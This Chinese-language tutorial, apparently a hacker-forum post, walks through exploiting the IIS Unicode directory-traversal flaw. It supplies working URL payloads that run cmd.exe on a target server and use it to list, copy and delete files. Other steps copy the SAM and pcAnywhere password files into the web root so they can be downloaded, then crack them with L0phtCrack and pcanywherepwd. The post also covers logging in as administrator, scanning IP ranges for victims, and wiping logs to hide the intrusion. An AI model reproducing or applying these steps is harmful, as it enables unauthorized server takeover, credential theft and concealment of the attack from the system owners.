这个漏洞分四种,每一种针对不同语系的系统。分为:%c1%1c、%c0%cf、%c1%pc、%c0%9v。例如第一个 %c1%1c 的问题。c1 1c,中文简体里面没有这种字,照正常的情况根据内码转换文件\winnt\system32\c_936.nls会编码成“?”。但对中文简体版IIS中 c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路径串中的“..\”之后,所以可以突破IIS路径访问到上级目录。此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,好像台湾繁体中文也受此漏洞影响。美国很多主机上也有这个漏洞,大都分是最后一种%c0%9v。好好利用吧,一步一步跟我来!
一、程序的实现
如果您对一个一个键打入命令不感兴趣的话,您可以直接看第二部分的工具篇,但我建议您还是看一看,使用工具也要用到一些命令的,我尽可能讲得通俗易懂一点。
假设你已经扫描到某台主机xxx.xxx.xxx.xxx有unicode漏洞(至于用什么工具扫描,工具篇中会讲到)打开你的浏览器,键入:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
+在这里的意思是空格,也就是说这个命令在本机DOS下是:dir c:(列出远程主机C:\下的所有文件)
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\autoexec.bak
这个命令在本机DOS下是:copy c:\autoexec.bat c:\autoexec.bak(也就是复制远程主机C盘下的autoexec.bat并改名为autoexec.bak)
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\autoexec.bak
这个命令在本机DOS下是: del c:\autoexec.bak(也就是删除远程主机C盘下的autoexec.bak)
接下来的工作就是要把这台服务器NT的密码文件拷贝到网站目录下,为什么要拷贝到网站目录下呢?你有权限下载啊,笨~~~!!!
这又分两种情况,一种是直接用NT管理的机器,它的密码文件是sam._,另一种是用赛门铁克的远程管理软件PCAnyWhere进行远程管理,它的密码文件是*.cif,其实两种密码文件取得的方式都相同,只是得到密码后控制的方式不同罢了。
需要知道网站目录,可以通过ida、idq漏洞进行得到,也可以去寻找网站中的一个图片文件,比如Tscontent.gif文件,然后去查找该文件:使用命令 dir c:\ Tscontent.gif /s,知道目录后,比如为c:\inetpub\wwwroot\,接下来
1、sam._的文件的取得
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\repair\sam._+c:\inetpub\wwwroot\
看懂了吗?把c:\winnt\repair下的sam._复制到c:\inetpub\wwwroot\
接下来,http://xxx.xxx.xxx.xxx/sam._ ,把sam._下载到本地
2、*.cif的取得
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\*.cif+/s
这是搜索C盘下的cif文件,通常找出来的有Citempl.cif和另一个什么名字的cif文件,一般Citempl.cif为系统默认的密码文件,因此我们需要后者,例如叫SA.CIF,它所在目录为c:\Program Files\pcANYWHERE\DATA,执行:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\Program Files\pcANYWHERE\DATA\SA.CIF+c:\inetpub\wwwroot\
把c:\Program Files\pcANYWHERE\DATA下的SA.CIF复制到c:\inetpub\wwwroot\
接下来,http://xxx.xxx.xxx.xxx/SA.CIF ,把SA.CIF下载到本地
重要的一点是下载完毕以后记住把c:\inetpub\wwwroot\sam._或c:\inetpub\wwwroot\SA.CIF给删掉,清除你的痕迹!
得到密码文件后
1、sam._文件
sam._的文件的破解工具叫L0phtCrack,工具篇会详细提到,这里就不多说了。执行L0phtCrack并得到Nt Password,比如说是123456,执行:C:\>newletmein \\xxx.xxx.xxx -admin
扫描主机,发现管理员ID是:asdfghjk,执行:C:\>net use \\xxx.xxx.xxx.xxxc$123456 /user:asdfghjk 成功连上对方主机,大功告成!现在你就是root的身份了,为所欲为吧,兄弟!
2、*.cif
*.cif的文件的破解工具叫pcanywherepwd,工具篇会详细提到,这里就不多说了。执行pcanywherepwd并得到PCAnyWhere Password,启动PCAnyWhere登陆主机,又一个管理员出现了,呵呵!
最后记住一点,NT存放日志的目录在:winnt\system32\logfiles,记住毁尸灭迹!
二、工具篇
下面提到的工具很多的黑网站都有下载,前面我们提到了那些工具可以扫描出那主机有UNICODE漏洞,这个工具叫UNICODE漏洞扫描仪,能扫描指定网段内有UNICODE漏洞的主机,很简单吧,填入你想扫描的起始IP和结束IP,让它慢慢扫吧。扫描速度的值不要填太大,否则很容易出错。
在程序实现篇里讲了那么多难记的命令,您是不是快记不住了,不要紧,DOS您会用吧?下面出场的这个工具叫unicode,它能远程利用unicode漏洞执行类似DOS命令在菜单“File”中选“Connect...”,在弹出的窗口中分别填入所要连接主机的IP和Excute类型,A、B、C、D分别对应%c1%1c、%c0%cf、%c1%pc、%c0%9v。然后OK,然后键入DOS命令,就像操作本机一样简单。
接下来介绍的是两种密码文件的破解工具
1、sam._文件
开始说到了sam._的文件的破解工具叫L0phtCrack菜单“File-Import SAM File...”,导入sam._文件,菜单“File-Open Password File...”导入字典,菜单“Tools-Run Crack”,开始破解。
大家看到了,实际上这就是一个暴力破解器,要用到字典,时间可能比较长。
2、*.cif
开始说到了*.cif的文件的破解工具叫pcanywherepwd,
这个工具的使用就更简单了,导入*.cif文件,点Crack,用户名和密码就得到了。
得到密码后的入侵请看上面的程序实现篇